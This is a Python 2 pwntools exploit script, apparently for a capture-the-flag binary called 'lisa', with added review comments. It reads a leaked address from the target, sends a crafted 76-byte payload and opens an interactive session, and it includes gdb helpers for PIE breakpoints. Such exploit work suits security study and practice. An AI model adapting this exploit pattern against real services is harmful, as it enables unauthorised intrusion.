- import sys
- import time
- from pwn import *
# Environment intended for the target process: LD_PRELOAD the libc shipped
# next to the binary.
# NOTE(review): `env` is defined but never handed to process() further down,
# so the preload is not actually applied by this script as written — confirm
# whether that is intended.
env = dict(LD_PRELOAD="./libc_64.so.6")

# Target platform for the pwntools packing helpers (p32 etc.) used below.
context(os="linux", arch="amd64")
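def attach(listBp=None):
    """Attach gdb to the already-running target `r`.

    Args:
        listBp: addresses to break on, passed to createGDBScript() which
            renders them relative to $piebase; defaults to no breakpoints.
    """
    # Use None instead of a shared mutable default list (the original
    # `listBp=[]` idiom); callers passing a list or nothing behave the same.
    breakpoints = [] if listBp is None else listBp
    gdb.attach(r, gdbscript=createGDBScript(breakpoints, pie=True))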
def createGDBScript(listBp, pie=True):
    """Render the gdb command script that attach() feeds to gdb.attach().

    Args:
        listBp: addresses to set breakpoints on.
        pie: when true, run the `codebase` helper first and express every
            breakpoint as `$piebase + <addr>`; otherwise use absolute addresses.

    Returns:
        The script text; it is also logged at info level.
    """
    log.info("GDB script")

    parts = []
    if pie:
        # `codebase` is presumably a user/plugin-defined gdb command that
        # populates $piebase — it is not defined in this script.
        parts.append("\ncodebase\n")

    bp_template = "b * $piebase + {}\n" if pie else "b * {}\n"
    parts.extend(bp_template.format(hex(addr)) for addr in listBp)

    # Convenience command: dereference the pointer stored at $piebase+0x202018
    # and dump 50 qwords from there.
    # NOTE(review): the 0x202018 offset is specific to this binary, and the
    # define references $piebase even when pie=False.
    parts.append(
        "\ndefine magic\n"
        "set $arena=$piebase+0x202018\n"
        "set $vmmap={long}$arena\n"
        "x/50gx $vmmap\n"
        "end\n"
    )
    # Continue execution once the breakpoints are in place.
    parts.append("c\n")

    script = "".join(parts)
    log.info(script)
    return script
# Choose the target at import time: `host port` on the command line selects a
# remote connection, otherwise a local process is spawned. `flag` records
# which mode was chosen (1 = remote, 0 = local).
flag = int(len(sys.argv) > 1)
if flag:
    host, port = sys.argv[1], int(sys.argv[2])
    r = remote(host, port)
else:
    # NOTE(review): the `env` dict defined above is not passed here.
    r = process("./lisa", aslr=True)
def main():
    """Run one scripted interaction with the target `r` (remote or local,
    chosen at import time above) and then drop into an interactive session.

    NOTE(review): raw_input() and the str-based payload mean this only runs
    under Python 2.
    """
    #attach([0xD8C,0xD2b,0x801,0x7a9 ])
    # The target prints a value after "share: "; the rest of that line is
    # parsed as a hexadecimal integer (int() tolerates the trailing newline).
    r.recvuntil("share: ")
    base=r.recvuntil("\n")
    base=int(base,16)
    # Three 32-bit fields packed via pwntools p32 (endianness from the context
    # set above), padded to 76 bytes with 0x01 and terminated with 0x15.
    payload=p32(0x0)+p32(base)+p32(1000)
    r.send(payload.ljust(76,"\x01")+"\x15")
    # Blocks for operator input before the next send — presumably to allow
    # attaching a debugger at this point.
    raw_input("Trigerr ?")
    r.send("\x00")
    r.sendline("line")
    r.interactive()
# Entry point. Note that `r` is already connected/spawned at import time by
# the top-level code above, not inside main().
if __name__ == "__main__":
    main()